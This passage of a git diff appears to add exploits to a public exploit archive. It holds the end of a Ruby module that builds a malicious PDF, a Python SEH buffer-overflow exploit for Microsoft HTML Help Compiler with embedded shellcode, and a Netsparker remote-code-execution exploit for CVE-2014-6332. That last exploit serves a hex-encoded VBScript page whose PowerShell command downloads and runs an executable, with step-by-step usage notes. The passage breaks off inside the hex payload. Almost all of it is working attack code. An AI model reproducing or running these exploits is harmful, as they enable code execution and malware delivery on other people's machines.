+    stream_1 << "0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q" << eol
+    stream_1 << "endstream" << eol
+    add_object(6, nObfu("<</Length 91>>#{stream_1}"))
+    stream = "<<" << eol
+    stream << "/Width 230" << eol
+    stream << "/BitsPerComponent 8" << eol
+    stream << "/Name /X" << eol
+    stream << "/Height 50" << eol
+    stream << "/Intent /RelativeColorimetric" << eol
+    stream << "/Subtype /Image" << eol
+    stream << "/Filter /DCTDecode" << eol
+    stream << "/Length #{jpeg.length}" << eol
+    stream << "/ColorSpace /DeviceCMYK" << eol
+    stream << "/Type /XObject" << eol
+    stream << ">>"
+    stream << "stream" << eol
+    stream << jpeg << eol
+    stream << "endstream" << eol
+    add_object(7, stream)
+    finish_pdf
+  end  
+
+end
diff --git a/platforms/windows/local/37771.py b/platforms/windows/local/37771.py
new file mode 100755
index 000000000..d4a237efc
--- /dev/null
+++ b/platforms/windows/local/37771.py
@@ -0,0 +1,52 @@
+#!/usr/bin/env python
+#
+# Exploit Title: Microsoft HTML Help Compiler SEH Based Overflow
+# Date: 2015-08-13
+# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
+# Twitter: st0rnpentest
+#
+# Vendor Homepage: www.microsoft.com
+# Software Link: http://www.microsoft.com/downloads/details.aspx?FamilyID=00535334-c8a6-452f-9aa0-d597d16580cc&displaylang=en
+# Version: 4.74.8702.0
+# Tested on: Windows 7
+#
+
+from subprocess import Popen
+from struct import pack
+
+
+# 112 bytes All Windows Null-Free CreateProcessA Calc Shellcode
+# We have only 189 bytes after SE Handler
+# https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
+
+shellcode=""
+shellcode+="\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
+shellcode+="\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
+shellcode+="\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
+shellcode+="\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
+shellcode+="\x57\x78\x01\xc2\x8b\x7a\x20\x01"
+shellcode+="\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
+shellcode+="\x45\x81\x3e\x43\x72\x65\x61\x75"
+shellcode+="\xf2\x81\x7e\x08\x6f\x63\x65\x73"
+shellcode+="\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
+shellcode+="\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
+shellcode+="\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
+shellcode+="\xb1\xff\x53\xe2\xfd\x68\x63\x61"
+shellcode+="\x6c\x63\x89\xe2\x52\x52\x53\x53"
+shellcode+="\x53\x53\x53\x53\x52\x53\xff\xd7"
+
+junk='\x61'*284
+nseh='\xeb\x1e\x90\x90'     # jump 30 bytes
+nop='\x90'*40               # nop
+seh=pack("<I", 0x45312d14)  # pop ecx # pop ecx # ret  | asciiprint,ascii {PAGE_EXECUTE_READ} [HHA.dll]
+
+payload=junk+nseh+seh+nop+shellcode
+padding='\x61'*(10000-len(payload))
+
+exploit=payload+padding
+
+try:
+ Popen(["C:\Program Files\HTML Help Workshop\hhc.exe",exploit],shell=False)
+ print "Hack'n'Roll"
+except:
+ print "Cannot run hhc.exe"
\ No newline at end of file
diff --git a/platforms/windows/remote/37746.py b/platforms/windows/remote/37746.py
new file mode 100755
index 000000000..86417e42e
--- /dev/null
+++ b/platforms/windows/remote/37746.py
@@ -0,0 +1,217 @@
+#!/usr/bin/python
+# Title : Netsparker 2.3.X - Remote Code Execution
+# Tested on Netsparker 2.3.x / Win 7
+#
+#
+# Author      :   Hesam Bazvand
+# E-Mail      :   black.king066@gmail.com
+# FaceBook    :   https://www.facebook.com/hesam.king73
+# Twitter     :   https://twitter.com/hesam_king73
+#
+#
+# Exploit MS14-064 CVE2014-6332
+#
+#
+# 1 . run python code : python netsparker.py
+# 2 . run netsparker
+# 3 . "Start a New Scan"
+# 4 . Enter your exploit link http://ipaddress:80/ in Target URL
+# 5 . goto to "Authentication" Menu
+# 6 . select "Form Authentication"
+# 7 . Click "Next >"
+# 10 . Your Link Download/Execute on your target ;)
+# 11 . Finished ;)
+
+import socket
+
+HOST, PORT = '', 80
+
+listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+listen_socket.bind((HOST, PORT))
+listen_socket.listen(1)
+print 'Serving HTTP on port %s ...' % PORT
+while True:
+    client_connection, client_address = listen_socket.accept()
+    request = client_connection.recv(1024)
+    print request
+    hesam=("\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76"
+           "\x3d\x22\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x22\x20\x63\x6f\x6e\x74\x65"
+           "\x6e\x74\x3d\x22\x49\x45\x3d\x45\x6d\x75\x6c\x61\x74\x65\x49\x45\x38\x22\x20\x3e\x0d\x0a\x3c\x68"
+           "\x65\x61\x64\x3e\x0d\x0a\x3c\x2f\x68\x65\x61\x64\x3e\x0d\x0a\x3c\x62\x6f\x64\x79\x3e\x0d\x0a\x20"
+           "\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47\x45\x3d\x22\x56\x42\x53\x63"
+           "\x72\x69\x70\x74\x22\x3e\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6e\x6d\x75"
+           "\x6d\x61\x61\x28\x29\x20\x0d\x0a\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20"
+           "\x4e\x65\x78\x74\x0d\x0a\x73\x65\x74\x20\x73\x68\x65\x6c\x6c\x3d\x63\x72\x65\x61\x74\x65\x6f\x62"
+           "\x6a\x65\x63\x74\x28\x22\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22"
+           "\x29\x0d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x3d\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x45\x78\x70\x72\x65"
+           "\x73\x73\x69\x6f\x6e\x20\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x53\x79\x73\x74\x65"
+           "\x6d\x2e\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61"
+           "\x64\x46\x69\x6c\x65\x28\x27\x46\x49\x4c\x45\x5f\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x27\x2c\x27\x6c"
+           "\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x2d"
+           "\x63\x6f\x6d\x20\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x29\x2e\x53"
+           "\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6c\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b"
+           "\x22\x0d\x0a\x73\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70"
+           "\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x2e\x65\x78\x65\x22\x2c\x20\x22\x2d\x43\x6f\x6d\x6d\x61\x6e"
+           "\x64\x20\x22\x20\x26\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x22\x22\x2c\x20\x22\x72\x75\x6e\x61"
+           "\x73\x22\x2c\x20\x30\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x3c\x2f\x73"
+           "\x63\x72\x69\x70\x74\x3e\x0d\x0a\x20\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55"
+           "\x41\x47\x45\x3d\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x20\x20\x0d\x0a\x64\x69\x6d"
+           "\x20\x20\x20\x61\x61\x28\x29\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x29\x0d\x0a\x64\x69\x6d"
+           "\x20\x20\x20\x61\x30\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x31\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61"
+           "\x32\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x33\x0d\x0a\x64\x69\x6d\x20\x20\x20\x77\x69\x6e\x39\x78"
+           "\x0d\x0a\x64\x69\x6d\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x0d\x0a\x64\x69\x6d\x20"
+           "\x20\x20\x72\x6e\x64\x61\x0d\x0a\x64\x69\x6d\x20\x20\x20\x66\x75\x6e\x63\x6c\x61\x73\x73\x0d\x0a"
+           "\x64\x69\x6d\x20\x20\x20\x6d\x79\x61\x72\x72\x61\x79\x0d\x0a\x20\x0d\x0a\x42\x65\x67\x69\x6e\x28"
+           "\x29\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x42\x65\x67\x69\x6e\x28\x29\x0d\x0a"
+           "\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a"
+           "\x20\x20\x69\x6e\x66\x6f\x3d\x4e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x55\x73\x65\x72\x41\x67\x65"
+           "\x6e\x74\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22"
+           "\x57\x69\x6e\x36\x34\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20"
+           "\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69"
+           "\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x20\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22"
+           "\x4d\x53\x49\x45\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x20\x0d\x0a\x20\x20\x20\x20\x20"
+           "\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x43\x49\x6e"
+           "\x74\x28\x4d\x69\x64\x28\x69\x6e\x66\x6f\x2c\x20\x49\x6e\x53\x74\x72\x28\x69\x6e\x66\x6f\x2c\x20"
+           "\x22\x4d\x53\x49\x45\x22\x29\x20\x2b\x20\x35\x2c\x20\x32\x29\x29\x20\x20\x20\x0d\x0a\x20\x20\x65"
+           "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f"
+           "\x6e\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x65"
+           "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x77\x69\x6e\x39\x78\x3d\x30\x0d\x0a\x20\x0d\x0a"
+           "\x20\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x49\x66\x20\x43\x72\x65\x61"
+           "\x74\x65\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61"
+           "\x72\x72\x61\x79\x3d\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68"
+           "\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30"
+           "\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72"
+           "\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61"
+           "\x72\x72\x61\x79\x3d\x6d\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68"
+           "\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28"
+           "\x30\x29\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f"
+           "\x6e\x3c\x34\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75"
+           "\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x62\x72\x3e\x20\x49\x45\x22\x29\x0d\x0a\x20"
+           "\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x69"
+           "\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6e"
+           "\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
+           "\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x20\x20\x0d\x0a\x20\x20"
+           "\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29"
+           "\x0d\x0a\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69\x66\x0d"
+           "\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69"
+           "\x6f\x6e\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x20\x52\x61\x6e\x64\x6f"
+           "\x6d\x69\x7a\x65\x28\x29\x0d\x0a\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x61\x28\x35\x29\x0d\x0a"
+           "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x62\x28\x35\x29\x0d\x0a\x20\x20\x20\x61\x30\x3d\x31\x33"
+           "\x2b\x31\x37\x2a\x72\x6e\x64\x28\x36\x29\x0d\x0a\x20\x20\x20\x61\x33\x3d\x37\x2b\x33\x2a\x72\x6e"
+           "\x64\x28\x35\x29\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66"
+           "\x75\x6e\x63\x74\x69\x6f\x6e\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0d\x0a\x20\x20\x4f\x6e\x20\x45"
+           "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x64\x69\x6d\x20"
+           "\x69\x0d\x0a\x20\x20\x43\x72\x65\x61\x74\x65\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x46\x6f\x72"
+           "\x20\x69\x20\x3d\x20\x30\x20\x54\x6f\x20\x34\x30\x30\x0d\x0a\x20\x20\x20\x20\x49\x66\x20\x4f\x76"
+           "\x65\x72\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x43"
+           "\x72\x65\x61\x74\x65\x3d\x54\x72\x75\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20"
+           "\x46\x6f\x72\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x0d\x0a\x20\x20\x4e\x65\x78\x74"
+           "\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x73\x75\x62\x20\x74"
+           "\x65\x73\x74\x61\x61\x28\x29\x0d\x0a\x65\x6e\x64\x20\x73\x75\x62\x0d\x0a\x20\x0d\x0a\x66\x75\x6e"
+           "\x63\x74\x69\x6f\x6e\x20\x6d\x79\x64\x61\x74\x61\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45"
+           "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20\x20\x69"
+           "\x3d\x74\x65\x73\x74\x61\x61\x0d\x0a\x20\x20\x20\x20\x20\x69\x3d\x6e\x75\x6c\x6c\x0d\x0a\x20\x20"
+           "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32"
+           "\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a"
+           "\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x69\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30"
+           "\x29\x3d\x36\x2e\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2d\x33\x31\x34\x0d"
+           "\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x3d\x6d\x79\x61\x72\x72\x61"
+           "\x79\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x37\x34\x30\x38\x38\x35\x33\x34"
+           "\x37\x33\x31\x33\x32\x34\x45\x2d\x33\x31\x30\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x64\x61"
+           "\x74\x61\x3d\x61\x61\x28\x61\x31\x29\x0d\x0a\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50"
+           "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75"
+           "\x6e\x63\x74\x69\x6f\x6e\x20\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20"
+           "\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e"
+           "\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20"
+           "\x69\x3d\x6d\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28"
+           "\x69\x2b\x38\x29\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28\x69\x2b\x31\x36\x29\x0d\x0a\x20"
+           "\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x33\x34\x29\x20\x20\x0d\x0a\x20\x20\x20"
+           "\x20\x66\x6f\x72\x20\x6b\x3d\x30\x20\x74\x6f\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0d"
+           "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x32\x30\x2b\x6b"
+           "\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6a\x3d\x31\x34\x29\x20\x74\x68\x65\x6e"
+           "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x20\x20\x20\x20"
+           "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64"
+           "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20"
+           "\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x28"
+           "\x69\x2b\x26\x68\x31\x31\x63\x2b\x6b\x29\x3d\x61\x62\x28\x34\x29\x0d\x0a\x20\x20\x20\x20\x20\x20"
+           "\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20"
+           "\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x0d\x0a"
+           "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68"
+           "\x31\x32\x30\x2b\x6b\x29\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20"
+           "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6f\x72\x0d\x0a"
+           "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20"
+           "\x20\x20\x6e\x65\x78\x74\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x36\x39\x37"
+           "\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x0d\x0a\x20\x20\x20\x20\x72\x75"
+           "\x6e\x6d\x75\x6d\x61\x61\x28\x29\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d"
+           "\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x4f\x76\x65\x72\x28\x29\x0d\x0a\x20\x20\x20"
+           "\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20"
+           "\x20\x20\x20\x64\x69\x6d\x20\x74\x79\x70\x65\x31\x2c\x74\x79\x70\x65\x32\x2c\x74\x79\x70\x65\x33"
+           "\x0d\x0a\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x61\x30"
+           "\x3d\x61\x30\x2b\x61\x33\x0d\x0a\x20\x20\x20\x20\x61\x31\x3d\x61\x30\x2b\x32\x0d\x0a\x20\x20\x20"
+           "\x20\x61\x32\x3d\x61\x30\x2b\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0d\x0a\x20\x20\x20\x0d\x0a\x20"
+           "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30"
+           "\x29\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20"
+           "\x20\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65"
+           "\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x74"
+           "\x79\x70\x65\x31\x3d\x31\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x31\x32\x33\x34"
+           "\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38"
+           "\x39\x30\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3d\x31\x30\x0d\x0a\x20\x20\x20\x20\x20"
+           "\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28"
+           "\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x20\x3d\x20\x46\x61\x6c\x73\x65\x29\x20\x54\x68\x65\x6e\x0d"
+           "\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x3c\x34\x29"
+           "\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x65\x6d\x3d\x63\x69"
+           "\x6e\x74\x28\x61\x30\x2b\x31\x29\x2a\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
+           "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x76\x61\x72\x74\x79\x70\x65\x28\x61"
+           "\x61\x28\x61\x31\x2d\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28"
+           "\x28\x6a\x3d\x6d\x65\x6d\x2b\x34\x29\x20\x6f\x72\x20\x28\x6a\x2a\x38\x3d\x6d\x65\x6d\x2b\x38\x29"
+           "\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66"
+           "\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20\x20"
+           "\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
+           "\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d"
+           "\x20\x46\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
+           "\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74"
+           "\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0d\x0a\x20\x20"
+           "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x20\x20"
+           "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
+           "\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65"
+           "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20"
+           "\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x20"
+           "\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20"
+           "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x0d\x0a\x20\x20"
+           "\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69"
+           "\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20"
+           "\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
+           "\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d\x20\x46"
+           "\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
+           "\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28"
+           "\x61\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20"
+           "\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20"
+           "\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65"
